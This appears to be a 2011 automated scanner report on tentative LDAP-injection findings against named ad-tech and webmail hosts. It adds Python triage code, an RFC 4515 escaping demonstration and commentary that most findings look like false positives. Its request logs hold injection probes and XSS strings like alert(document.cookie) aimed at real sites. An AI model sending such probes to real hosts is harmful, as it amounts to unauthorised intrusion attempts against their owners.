LDAP Injection, DORK, Vulnerable Hosts, LDAP Query

CWE-90: Improper Neutralization of Special Elements used in an LDAP Query ('LDAP Injection')

Report generated by XSS.CX at Mon Mar 07 19:17:28 CST 2011.


The DORK Report


1. LDAP injection

1.1. http://ar.voicefive.com/bmx3/broker.pli [pid parameter]

1.2. http://data.cmcore.com/imp [ci parameter]

1.3. http://tap-cdn.rubiconproject.com/partner/scripts/rubicon/alice.js [REST URL parameter 3]

1.4. https://webmail.roadrunner.com/includes/webmail.416a.css [BIGipServerCDPTPA-Web-Pool cookie]



1. LDAP injection
There are 4 instances of this issue:

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws are often unreliable and prone to false positives: the scanner only knows that two responses differed, not why. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. Every finding in this report is marked Tentative; for each one, compare the paired responses below (status line, body length, and whether the payload is simply echoed back) before treating it as confirmed.
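The following is an added example, not part of the XSS.CX report or of Burp's own logic: a small triage helper that does the comparison the note above asks for. It drops headers that legitimately vary between two otherwise identical responses, masks the reflected payload, compares what is left, and separately reports whether each response merely echoes the payload's random token. The sample responses are trimmed copies of findings 1.1 and 1.3 from this report; the header list and verdict wording are this example's own choices.

```python
"""Added example, not part of the XSS.CX report: a triage helper for
difference-based LDAP-injection findings. It drops volatile headers, masks
the reflected payload, compares what is left, and checks each response for
the payload's unique token. Sample responses are trimmed copies of findings
1.1 and 1.3 from this report."""
import re
from typing import NamedTuple

# Headers that change between otherwise identical responses (assumed list).
VOLATILE_HEADERS = {"date", "expires", "set-cookie", "last-modified", "etag"}

class Normalised(NamedTuple):
    status: str
    headers: tuple
    body: str

def normalise(raw: str, payload: str) -> Normalised:
    """Keep only the parts of a response that should be stable across the pair."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    status, *header_lines = head.split("\n")
    kept = []
    for line in header_lines:
        name, _, value = line.partition(":")
        if name.strip().lower() not in VOLATILE_HEADERS:
            kept.append(f"{name.strip().lower()}: {value.strip()}")
    masked = body.replace(payload, "<PAYLOAD>").strip()
    return Normalised(status.strip(), tuple(sorted(kept)), masked)

def token_of(payload: str) -> str:
    """The random hex prefix the scanner puts before ')(sn=*' and ')!(sn=*'."""
    return re.match(r"[0-9a-f]+", payload).group(0)

def triage(resp_a: str, payload_a: str, resp_b: str, payload_b: str) -> dict:
    a, b = normalise(resp_a, payload_a), normalise(resp_b, payload_b)
    if a.status != b.status or a.body != b.body:
        verdict = "investigate: status or body differs"
    elif a.headers != b.headers:
        verdict = "header-only difference: check for session or cache noise"
    else:
        verdict = "likely false positive: identical once volatile data is removed"
    return {
        "status_differs": a.status != b.status,
        "headers_differ": a.headers != b.headers,
        "body_differs": a.body != b.body,
        # An echoed token shows the value is reflected; it says nothing about LDAP.
        "token_reflected": (token_of(payload_a) in resp_a, token_of(payload_b) in resp_b),
        "verdict": verdict,
    }

# Trimmed from finding 1.1 (ar.voicefive.com): same body for both payloads.
R11_A = """HTTP/1.1 200 OK
Server: nginx
Date: Mon, 07 Mar 2011 01:33:59 GMT
Content-Type: application/x-javascript
Set-Cookie: ar_8c42615bf40cc5bc)(sn=exp=1&prad=1124773&arc=1417957&; path=/; domain=.voicefive.com;
Content-Length: 9

/*error*/"""
R11_B = R11_A.replace(")(sn=", ")!(sn=")

# Trimmed from finding 1.3 (tap-cdn.rubiconproject.com): 200 JavaScript vs 404 HTML.
R13_A = """HTTP/1.1 200 OK
Server: TRP Apache-Coyote/1.1
Content-Type: text/javascript;charset=UTF-8
Content-Length: 10590

oz_partner = "109a64327263f5fe)(sn=*";
oz_partner_channel="7469/12005";"""
R13_B = """HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
Content-Type: text/html; charset=iso-8859-1
Content-Length: 221

<title>404 Not Found</title>
<p>The requested URL /oz/scripts/alice_js.jsp was not found on this server.</p>"""

if __name__ == "__main__":
    print(triage(R11_A, "8c42615bf40cc5bc)(sn=*", R11_B, "8c42615bf40cc5bc)!(sn=*"))
    print(triage(R13_A, "109a64327263f5fe)(sn=*", R13_B, "109a64327263f5fe)!(sn=*"))
```

Run against finding 1.1 the helper reports no difference once Date and Set-Cookie are removed, with the token reflected in both responses; against finding 1.3 it reports a status difference, which is a reason to look closer, not yet a confirmed LDAP query.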

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations it is appropriate to allow only short alphanumeric strings to be copied into queries and to reject everything else. At a minimum, input containing LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace, and the backslash, which is the filter escape character. Where arbitrary values must be accepted (a surname with an apostrophe, for example), escape them according to RFC 4515 instead: the characters that change a filter's meaning are ( ) * \ and NUL, and each is replaced by a backslash followed by its two-digit hex code, so the input can only ever be a literal assertion value.
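The following is an added example, not code from the XSS.CX report or from any of the scanned sites. It shows why the scanner's payload pair (X)(sn=* and X)!(sn=*) is a sensible probe for a filter built by string concatenation, and puts the two remediations above beside the flaw: the first payload leaves the filter syntactically valid but makes it match every entry that has an sn attribute, while the second produces a syntax error. The filter parser and evaluator are a toy written for this example (equality and presence matching only), and DIRECTORY is constructed test data.

```python
"""Added example, not code from the XSS.CX report or from any scanned site.
Toy RFC 4515 filter parser/evaluator plus a vulnerable, an escaped and an
allowlisted filter builder. DIRECTORY is constructed test data."""
import re

# RFC 4515 section 3: characters that must be escaped inside an assertion value.
_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}

def escape_filter_value(value: str) -> str:
    return "".join(_ESCAPES.get(ch, ch) for ch in value)

def unescape_filter_value(value: str) -> str:
    return re.sub(r"\\([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), value)

def vulnerable_filter(user_id: str) -> str:
    """The flaw: raw input concatenated into a disjunctive filter."""
    return f"(|(uid={user_id})(mail={user_id}))"

def hardened_filter(user_id: str) -> str:
    """Fix 1: escape, so the input can only ever be a literal assertion value."""
    v = escape_filter_value(user_id)
    return f"(|(uid={v})(mail={v}))"

_ALLOWED = re.compile(r"[A-Za-z0-9]{1,32}")

def validated_filter(user_id: str) -> str:
    """Fix 2: reject anything that is not a short alphanumeric identifier."""
    if not _ALLOWED.fullmatch(user_id):
        raise ValueError("identifier must be 1-32 alphanumeric characters")
    return f"(|(uid={user_id})(mail={user_id}))"

def _parse(s: str, i: int):
    """Recursive-descent parse of one parenthesised filter starting at s[i]."""
    if i >= len(s) or s[i] != "(":
        raise ValueError(f"expected '(' at {i}")
    i += 1
    if i < len(s) and s[i] in "&|":
        op, kids, i = s[i], [], i + 1
        while i < len(s) and s[i] == "(":
            kid, i = _parse(s, i)
            kids.append(kid)
        if not kids:
            raise ValueError("empty &/| set")
        node = (op, kids)
    elif i < len(s) and s[i] == "!":
        kid, i = _parse(s, i + 1)
        node = ("!", [kid])
    else:
        j = s.find(")", i)
        if j == -1 or "(" in s[i:j] or "=" not in s[i:j]:
            raise ValueError(f"bad simple item at {i}")
        attr, _, val = s[i:j].partition("=")
        node, i = ("=", attr, val), j
    if i >= len(s) or s[i] != ")":
        raise ValueError(f"expected ')' at {i}")  # where X)!(sn=* breaks
    return node, i + 1

def parse_filter(s: str):
    node, end = _parse(s, 0)
    if end != len(s):
        raise ValueError("trailing data after filter")
    return node

def matches(node, entry: dict) -> bool:
    """Toy evaluator: and/or/not, presence (attr=*) and exact equality only."""
    op = node[0]
    if op == "&":
        return all(matches(k, entry) for k in node[1])
    if op == "|":
        return any(matches(k, entry) for k in node[1])
    if op == "!":
        return not matches(node[1][0], entry)
    _, attr, val = node
    if attr not in entry:
        return False
    return True if val == "*" else entry[attr] == unescape_filter_value(val)

def search(filter_str: str, entries) -> list:
    """uids matched by filter_str; raises ValueError if the filter is malformed."""
    node = parse_filter(filter_str)
    return [e["uid"] for e in entries if matches(node, e)]

DIRECTORY = [  # constructed test data
    {"uid": "alice", "sn": "Adams", "mail": "alice@example.test"},
    {"uid": "bob", "sn": "Baker", "mail": "bob@example.test"},
    {"uid": "svc-ldap", "mail": "svc@example.test"},  # no sn attribute
]

if __name__ == "__main__":
    for payload in ("alice", "8c42615bf40cc5bc)(sn=*", "8c42615bf40cc5bc)!(sn=*"):
        for build in (vulnerable_filter, hardened_filter):
            f = build(payload)
            try:
                print(f"{build.__name__:17} {f:62} -> {search(f, DIRECTORY)}")
            except ValueError as exc:
                print(f"{build.__name__:17} {f:62} -> syntax error: {exc}")
```

With the vulnerable builder, the )(sn=* payload returns alice and bob (everyone with an sn) and the )!(sn=* payload is rejected by the parser; that valid-versus-error asymmetry is the signal the scanner looks for. With either fix the same inputs return nothing or are refused before any filter is built.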


1.1. http://ar.voicefive.com/bmx3/broker.pli [pid parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The pid parameter was flagged as possibly vulnerable to LDAP injection.

The payloads 8c42615bf40cc5bc)(sn=* and 8c42615bf40cc5bc)!(sn=* were each submitted in the pid parameter. The scanner recorded the two responses as different, which would suggest that the input is being incorporated into a disjunctive LDAP query in an unsafe manner. Compare the two responses before accepting that: both are 200 OK with the same 9-byte body (/*error*/) and the same headers apart from Set-Cookie, and that header simply copies the pid value verbatim, unencoded, into a cookie name (ar_8c42615bf40cc5bc)(sn=...). Nothing in the exchange shows an LDAP query being evaluated, so treat this finding as unconfirmed.

Request 1

GET /bmx3/broker.pli?pid=8c42615bf40cc5bc)(sn=*&PRAd=1124773&AR_C=1417957 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/info/index.htm?61f90%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef6d4b116b2a=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p58096422=exp=14&initExp=Sun Feb 20 13:23:21 2011&recExp=Sun Feb 20 15:33:35 2011&cpn=%25m&prad=50296263&arc=37630094&; ar_p39750809=exp=4&initExp=Sun Feb 20 15:54:29 2011&recExp=Mon Feb 21 22:06:08 2011&prad=1210151&arc=1444454&; ar_p81479006=exp=1&initExp=Tue Mar 1 01:55:30 2011&recExp=Tue Mar 1 01:55:30 2011&prad=59117794&arc=40340043&; ar_p84053757=exp=2&initExp=Mon Mar 7 00:55:41 2011&recExp=Mon Mar 7 00:55:43 2011&prad=1160142&arc=1420280&; BMX_3PC=1; UID=2206bdab-24.143.206.75-1298208201; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1299459344%2E057%2Cwait%2D%3E10000%2C

Response 1

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 07 Mar 2011 01:33:59 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_8c42615bf40cc5bc)(sn=exp=1&initExp=Mon Mar 7 01:33:59 2011&recExp=Mon Mar 7 01:33:59 2011&prad=1124773&arc=1417957&; expires=Sun 05-Jun-2011 01:33:59 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 9

/*error*/

Request 2

GET /bmx3/broker.pli?pid=8c42615bf40cc5bc)!(sn=*&PRAd=1124773&AR_C=1417957 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/info/index.htm?61f90%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef6d4b116b2a=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p58096422=exp=14&initExp=Sun Feb 20 13:23:21 2011&recExp=Sun Feb 20 15:33:35 2011&cpn=%25m&prad=50296263&arc=37630094&; ar_p39750809=exp=4&initExp=Sun Feb 20 15:54:29 2011&recExp=Mon Feb 21 22:06:08 2011&prad=1210151&arc=1444454&; ar_p81479006=exp=1&initExp=Tue Mar 1 01:55:30 2011&recExp=Tue Mar 1 01:55:30 2011&prad=59117794&arc=40340043&; ar_p84053757=exp=2&initExp=Mon Mar 7 00:55:41 2011&recExp=Mon Mar 7 00:55:43 2011&prad=1160142&arc=1420280&; BMX_3PC=1; UID=2206bdab-24.143.206.75-1298208201; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1299459344%2E057%2Cwait%2D%3E10000%2C

Response 2

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 07 Mar 2011 01:33:59 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_8c42615bf40cc5bc)!(sn=exp=1&initExp=Mon Mar 7 01:33:59 2011&recExp=Mon Mar 7 01:33:59 2011&prad=1124773&arc=1417957&; expires=Sun 05-Jun-2011 01:33:59 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 9

/*error*/

1.2. http://data.cmcore.com/imp [ci parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://data.cmcore.com
Path:   /imp

Issue detail

The ci parameter was flagged as possibly vulnerable to LDAP injection.

The payloads 74889b964e0b55dc)(sn=* and 74889b964e0b55dc)!(sn=* were each submitted in the ci parameter. The scanner recorded the two responses as different, which would suggest that the input is being incorporated into a disjunctive LDAP query in an unsafe manner. The responses below do not bear that out: both return the same 43-byte GIF with the same headers, and the only variation is the Date (one second apart) and the Set-Cookie headers, which copy the ci value verbatim into the names of two cookies (<ci>_login and <ci>_reset). The payload is being echoed, not interpreted; treat this finding as unconfirmed.

Request 1

GET /imp?tid=17&ci=74889b964e0b55dc)(sn=*&vn1=4.1.1&vn2=e4.0&ec=ISO-8859-1&cm_mmc=Display-_-BannerAds-_-AkamaiNoPromo-_-Ak54&cvdone=s HTTP/1.1
Host: data.cmcore.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?5RoAAMGcFwCywIAAAAAAAL4xGwAAAAAAAAAEAAIAAAAAAA8AAgABFGbRJQAAAAAA82UjAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyZA8AAAAAAAIAAgAAAAAAAAAAAAAA8D8AAAAAAADwP93XgXNGlOY.ZmZmZmZm8j8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARyYOi9Ra9CRhNoLlmrpsdFRTRwgfIeHM7akU-AAAAAA==,,http%3A%2F%2Fwww.merriam-webster.com%2Fcreative.php%3Fpageid%3Dgeneral%26placement%3Dmw_gen_300_bot%26groupid%3D5267702644%26quantseg%3Dd%3At%3A2884%3A2775%3A1799%3A1361%3A1360%3A1355%3A1353%3A1349%3A1345%3A1343%3A1340%26keyword%3D%26subjcode%3D,Z%3D300x250%26s%3D1547457%26_salt%3D2014343997%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.merriam-webster.com%252Fcreative.php%253Fpageid%253DGeneral%2526placement%253DMW_GEN_300_BOT%2526groupid%253D5267702644%2526quantseg%253DD%253AT%253A2884%253A2775%253A1799%253A1361%253A1360%253A1355%253A1353%253A1349%253A1345%253A1343%253A1340%2526keyword%253D%2526subjcode%253D%26r%3D0,d8ad597a-4858-11e0-8d5e-003048d6d022
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CoreID6=30021298897084116815020; TestSess3=x

Response 1

HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 01:50:37 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 74889b964e0b55dc)(sn=*_login=1299462637015106151474889b964e0b55dc)(sn=*; path=/
Set-Cookie: 74889b964e0b55dc)(sn=*_reset=1299462637;path=/
Expires: Sun, 06 Mar 2011 07:50:37 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

Request 2

GET /imp?tid=17&ci=74889b964e0b55dc)!(sn=*&vn1=4.1.1&vn2=e4.0&ec=ISO-8859-1&cm_mmc=Display-_-BannerAds-_-AkamaiNoPromo-_-Ak54&cvdone=s HTTP/1.1
Host: data.cmcore.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?5RoAAMGcFwCywIAAAAAAAL4xGwAAAAAAAAAEAAIAAAAAAA8AAgABFGbRJQAAAAAA82UjAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyZA8AAAAAAAIAAgAAAAAAAAAAAAAA8D8AAAAAAADwP93XgXNGlOY.ZmZmZmZm8j8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARyYOi9Ra9CRhNoLlmrpsdFRTRwgfIeHM7akU-AAAAAA==,,http%3A%2F%2Fwww.merriam-webster.com%2Fcreative.php%3Fpageid%3Dgeneral%26placement%3Dmw_gen_300_bot%26groupid%3D5267702644%26quantseg%3Dd%3At%3A2884%3A2775%3A1799%3A1361%3A1360%3A1355%3A1353%3A1349%3A1345%3A1343%3A1340%26keyword%3D%26subjcode%3D,Z%3D300x250%26s%3D1547457%26_salt%3D2014343997%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.merriam-webster.com%252Fcreative.php%253Fpageid%253DGeneral%2526placement%253DMW_GEN_300_BOT%2526groupid%253D5267702644%2526quantseg%253DD%253AT%253A2884%253A2775%253A1799%253A1361%253A1360%253A1355%253A1353%253A1349%253A1345%253A1343%253A1340%2526keyword%253D%2526subjcode%253D%26r%3D0,d8ad597a-4858-11e0-8d5e-003048d6d022
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CoreID6=30021298897084116815020; TestSess3=x

Response 2

HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 01:50:38 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 74889b964e0b55dc)!(sn=*_login=1299462638015106151474889b964e0b55dc)!(sn=*; path=/
Set-Cookie: 74889b964e0b55dc)!(sn=*_reset=1299462638;path=/
Expires: Sun, 06 Mar 2011 07:50:38 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

1.3. http://tap-cdn.rubiconproject.com/partner/scripts/rubicon/alice.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap-cdn.rubiconproject.com
Path:   /partner/scripts/rubicon/alice.js

Issue detail

The third path segment of the URL (REST URL parameter 3) was flagged as possibly vulnerable to LDAP injection.

The payloads 109a64327263f5fe)(sn=* and 109a64327263f5fe)!(sn=* were each submitted as the third path segment. Here the two responses genuinely differ, which is what the scanner interprets as the input being incorporated into a disjunctive LDAP query in an unsafe manner. Look at how they differ, though: the )(sn=* request returns 200 with the JavaScript that reflects the segment verbatim (oz_partner = "109a64327263f5fe)(sn=*";), while the )!(sn=* request returns a 404 carrying a different Server header (Apache/2.2.3 instead of TRP Apache-Coyote/1.1) whose message names a different path, /oz/scripts/alice_js.jsp. A change of responding component and of resolved path is more consistent with URL routing or rewriting reacting to the characters in the path than with an LDAP filter syntax error inside one application. Confirm manually before reporting this as LDAP injection.

Request 1

GET /partner/scripts/109a64327263f5fe)(sn=*/alice.js?pc=7469/12005&ptc=20615 HTTP/1.1
Host: tap-cdn.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7469/12005/20615-9.html?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GKFXS0FR-AL95-10.250.119.239; put_2081=KH-00000000549735899; put_2025=a7d02798-393f-4104-ada5-fc2c44a755c0; put_1994=6pgp44i37uxw; put_1523=99c93c82-afc1-4f06-bdc1-8fb83dd4c018; put_2100=usr3fe6528d7df33180; put_1902=pFrKmPYNzMy9Ccea81vSnagHy5-9D53Np1zmR_H3; __utmz=58628265.1299283361.1.1.utmcsr=assets.rubiconproject.com|utmccn=(referral)|utmcmd=referral|utmcct=/; put_1512=4d5b2371-3928-7a83-24fb-d52328f5624b; put_1185=8392341830659049202; put_1986=4470455573253905340; put_2132=439524AE836A5E4D157CECA302E891CB; put_1197=3346767141746773094; lm="5 Mar 2011 00:09:20 GMT"; khaos=GKFXT7RL-D-D539; cd=false; put_1430=20108b4d-f8d0-4008-b157-1529097b61ab; __unam=84b15f2-12e8352bcfa-25f8d37f-6; __utma=58628265.419258632.1299283361.1299283361.1299330390.2; rpb=5671%3D1%265328%3D1%264940%3D1%262341%3D1%265557%3D1%263049%3D1%266198%3D1%266147%3D1%265901%3D1%264222%3D1%264894%3D1%266286%3D1%264214%3D1%262372%3D1%263169%3D1%262196%3D1%262111%3D1%262374%3D1%264554%3D1%265573%3D1%265575%3D1%262188%3D1%263748%3D1%266195%3D1; ruid=dd0a2"-alert(document.cookie)-"693757dd992^2^1299459402^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ+PP8TzZUxGDmBad2r6N25AKxdPo9e; ses15=7477^1&13531^1&12005^1; csi15=3172581.js^1^1299459402^1299459402&3193851.js^2^1299380258^1299434520&3175993.js^1^1299380257^1299380257; ses2=7477^37&12005^1; csi2=3172579.js^1^1299460672^1299460672&3193850.js^1^1299380258^1299380258&3086939.js^1^1299380252^1299380252; rdk=7469/12005; rdk9=0; ses9=13531^1&12005^1; csi9=3194819.js^1^1299460723^1299460723&3195084.js^1^1299434501^1299434501

Response 1

HTTP/1.1 200 OK
Server: TRP Apache-Coyote/1.1
Last-Modified: Mon, 07 Mar 2011 01:47:58 GMT
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Content-Type: text/javascript;charset=UTF-8
Cache-Control: private, max-age=3600
Expires: Mon, 07 Mar 2011 02:47:58 GMT
Date: Mon, 07 Mar 2011 01:47:58 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 10590




/*! Copyright 2009,2010 the Rubicon Project. All Rights Reserved. No permission is granted to use, copy or extend this code */





oz_partner = "109a64327263f5fe)(sn=*";
oz_partner_channel="7469/12005";
oz_partner_tracking_channel="20615";





if(typeof oz_page_profiled=="undefined"){oz_page_profiled=false;}if(typeof oz_subframes_allowed=="undefined"){oz_subframes_allowed=false;}if(typeof oz_source=="undefined"){oz_source=document;}var oz_scripts_loaded=new Object();function OthersOnlineSensor(){this.config={delayAfterLoad:2*1000,sensor_sample:100,pixel_sample:25,domain_specific_parsing:false,use_local_storage:false,subframes_allowed:false,host:"http://tap.rubiconproject.com",statichost:"http://tap-cdn.rubiconproject.com"};
this.default_context={oz_partner:"othersonline.com",oz_session_id:null,oz_partner_user_id:null,oz_partner_channel:null,oz_partner_tracking_channel:null};this.context=null;this.page_parser=null;this.timeout=1500;this.init=function(A){try{if(A){this.context=this.mergeProperties(A,this.default_context);
}else{this.context=this.default_context;}if(this.context.oz_host){this.config.host=this.context.oz_host;}if(this.context.oz_statichost){this.config.statichost=this.context.oz_statichost;}if(this.context.oz_delay){this.config.delayAfterLoad=this.context.oz_delay;}if(this.context.oz_subframes_allowed){this.config.subframes_allowed=this.context.oz_subframes_allowed;
}if(this.context.oz_local_storage){this.config.use_local_storage=this.context.oz_local_storage;}if(this.config.use_local_storage&&!this.context.oz_user_token&&(typeof oz_swfobject=="object")){try{if(
...[SNIP]...

Request 2

GET /partner/scripts/109a64327263f5fe)!(sn=*/alice.js?pc=7469/12005&ptc=20615 HTTP/1.1
Host: tap-cdn.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7469/12005/20615-9.html?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GKFXS0FR-AL95-10.250.119.239; put_2081=KH-00000000549735899; put_2025=a7d02798-393f-4104-ada5-fc2c44a755c0; put_1994=6pgp44i37uxw; put_1523=99c93c82-afc1-4f06-bdc1-8fb83dd4c018; put_2100=usr3fe6528d7df33180; put_1902=pFrKmPYNzMy9Ccea81vSnagHy5-9D53Np1zmR_H3; __utmz=58628265.1299283361.1.1.utmcsr=assets.rubiconproject.com|utmccn=(referral)|utmcmd=referral|utmcct=/; put_1512=4d5b2371-3928-7a83-24fb-d52328f5624b; put_1185=8392341830659049202; put_1986=4470455573253905340; put_2132=439524AE836A5E4D157CECA302E891CB; put_1197=3346767141746773094; lm="5 Mar 2011 00:09:20 GMT"; khaos=GKFXT7RL-D-D539; cd=false; put_1430=20108b4d-f8d0-4008-b157-1529097b61ab; __unam=84b15f2-12e8352bcfa-25f8d37f-6; __utma=58628265.419258632.1299283361.1299283361.1299330390.2; rpb=5671%3D1%265328%3D1%264940%3D1%262341%3D1%265557%3D1%263049%3D1%266198%3D1%266147%3D1%265901%3D1%264222%3D1%264894%3D1%266286%3D1%264214%3D1%262372%3D1%263169%3D1%262196%3D1%262111%3D1%262374%3D1%264554%3D1%265573%3D1%265575%3D1%262188%3D1%263748%3D1%266195%3D1; ruid=dd0a2"-alert(document.cookie)-"693757dd992^2^1299459402^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ+PP8TzZUxGDmBad2r6N25AKxdPo9e; ses15=7477^1&13531^1&12005^1; csi15=3172581.js^1^1299459402^1299459402&3193851.js^2^1299380258^1299434520&3175993.js^1^1299380257^1299380257; ses2=7477^37&12005^1; csi2=3172579.js^1^1299460672^1299460672&3193850.js^1^1299380258^1299380258&3086939.js^1^1299380252^1299380252; rdk=7469/12005; rdk9=0; ses9=13531^1&12005^1; csi9=3194819.js^1^1299460723^1299460723&3195084.js^1^1299434501^1299434501

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
Content-Type: text/html; charset=iso-8859-1
Cache-Control: private, max-age=86400
Date: Mon, 07 Mar 2011 01:47:58 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 221

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /oz/scripts/alice_js.jsp was not found on this server.</p>
</body></html>

1.4. https://webmail.roadrunner.com/includes/webmail.416a.css [BIGipServerCDPTPA-Web-Pool cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://webmail.roadrunner.com
Path:   /includes/webmail.416a.css

Issue detail

The BIGipServerCDPTPA-Web-Pool cookie was flagged as possibly vulnerable to LDAP injection. The BIGipServer prefix identifies an F5 BIG-IP load-balancer persistence cookie; it is consumed by the load balancer, not by the web application.

